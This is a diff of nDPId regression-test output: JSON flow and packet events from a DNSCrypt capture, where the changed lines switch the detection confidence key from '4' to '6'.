01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+mNAAL0R9vcKAAABrGhdUOhhBaMCCMyOtDcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mQgAL0REzcKAAABrGhdUN5GBaMGBBOttDgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":185,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739306241} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mQAub0ROAoKAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":946739306433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306433,"pkt":"ZmZmZmZmRERERERECABFAAFbc7kAADgRQ2SsaF1QCgAAAQWjwWgBRx3ktDmBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} 
@@ -369,34 +369,34 @@ 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc74AADgRQ1+saF1QCgAAAQWj3kYBRwEHtDiBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc7wAADgRQ2GsaF1QCgAAAQWjlYsBR0nFtDWBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} 
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc7sAADcRRGKsaF1QCgAAAQWjo0gBRzwJtDSBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} -00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctEJAAL0RBKQKAAABzbl0dJXNAikCCAUEnScBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
